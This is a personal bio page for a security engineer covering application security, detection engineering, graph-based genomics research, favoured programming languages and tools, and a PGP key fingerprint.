About
I think folks in the Technology industry come to the field in many ways, from friends who loved tinkering with electronics, or video games, or graphics. I came to Technology from Security, diving into the first release of DEP in my early teens. After 8 years working professionally in the industry, I’ve been fortunate enough to have held a diverse set of roles, from:
- Building cutting-edge predictive genomics applications that can operate over 10s of thousands of genomes when the standard was only a handful of genomes
- Application Security
- Training and building out a top-notch SOC that subsequently caught and remediated intrusions from script-kiddies to mid-sized criminal organizations
- Leading Detection Engineering and Threat Hunting for one of the most sought after targets in the world
- Putting together teams for a novel, graph-backed, cybersecurity product
These days I get my most enjoyment from being able to identify, put together, and highlight key people in organizations, to build high performance teams. I also do a fair amount of technical design, architecture, building initial MVPs, and scaling existing applications for the Enterprise market.
Sounds cheesy now, but I still love this quote:
“…it’s not enough to fight for a better world; we also have to live lives worth fighting for.”
-Eric Greitens, The Heart and the Fist
Technology
Security
I like security data lakes, and started my professional security career in application security. I’ve given a few internal talks on it in the past, but my general focus is on “how can we operate Security as an Engineering Practice”. On the Application Security side, I’ve ripped out and replaced a number of companies’ tooling, including:
- SAST
- DAST
- SCA
- Mobile Applications
In additon to manual code security work, vulnerability PoCs, education work.
On the Detection Engineering and Threat Hunting side, I’ve built out:
- Wholly custom features for StreamAlert that I’ve yet had time to PR
- Data lakes in AWS, Snowflake, Azure ADX, and full fledged YAML-to-Detection Infrastructure via Go/Pulumi/Terraform
- A lot of custom UEBA, Insider Threat, complex event correlation, entity normalization
Graphs
I have a few works in this space, and some writing from when I was a student (not listed):
- PyCon 2018: Spfy: analyzing E.coli genomes as graph data link
- Le,K.K., Whiteside,M.D., Hopkins,J.E., Gannon,V.P.J., Laing,C.R. Spfy: an integrated graph database for real-time prediction of bacterial phenotypes and downstream comparative analyses. Database (2018) Vol. 2018: article ID bay086; doi:10.1093/database/bay086
- Work around kmers / graph label predictions (similar to work around protein structure labelling): Prariedog link and it’s Golang variant link, some early optimizations (PyTorch) for operating on clusters of GPUs, before the advent of cuGraph
- I can probably talk your ear off about Blazegraph (now Neptune), Neo4j, Dgraph, etc.
Open Source
Small contributions to josepy, certbot, some ReactJS libraries, ML for neuroscience libraries, in addition to the predictive genomics applications from my work at the National Microbiology Lab.
Languages
Python
I write a lot of Python, mainly around three use cases: a. cybersecurity, b. data science applications, c. backends for full stack applications.
Cybersecurity:
- Application Security: I write vulnerability PoCs for web in Python, instead of something like Burp, for everything from handling request flows, payload writing, and including database vulnerabilities. I generally can take a CVE detail, for example like for Redis, and write a PoC for it without any source material. Or for my own code security work.
- I’m generally a proponent of graph-based application security tooling (like CodeQL) for variant research
- Detection Engineering: I write either fully Python, or some mix of Python and a query language (SQL/KQL) depending on the data lake backend
- Instrumentation / Other Pythons: I like Frida for a variety of things, but also use Pyinstrument for more Python/perfomance use cases. I’m also familiar with non CPython implementations like PyPy.
Data Science:
- Mostly the classic Python stack: Numpy, Scipy, Pandas, Arrow
- Some niche use cases: DGL, Diffpool, PyTorch
- Data Lakes/HPC: Snowflake, Databricks, ADX, Slurm
Backends for Full Stack:
- I’m more proficient in Flask than Django
- Task Queues: Redis-Queue, Celery
- Generally to support REST APIs, less so GraphQL
JavaScript
ReactJS mainly. For frontends to data analytics applications.
Material Design react-md, Polaris React. I was originally a proponent of card-based designs, but favor more “workbench” like designs lately. My frontend work was to support visualizing graph-based backends, but in a manner that is meaningful to end-users. I also read a lot of other people’s JavaScript code as part of my Application Security work.
I have a, albeit weird, love of Routing (React Router), State Management (Redux), Promises (Axios) in React.
R
I learned R during my Neuroscience degree, switching over to Python during my Software Engineering degree, and Python libraries instead.
Go
I’ve written Go for specific use cases:
- Applications that must run on multiple OS’s: mainly for my cybersecurity work
- Applications that must be strongly typed, RPC work, some distributed data processing services: also cybersecurity
- Some predictive genomics work where it suited the backend data store (Dgraph)
Once every few years blog. See LinkedIn for more formative stuff, Github for things I’m working on, and email should you need to get a hold of me.
5AD2 1839 835B 7966 58A4 16E9 A659 BC35 4726 32D7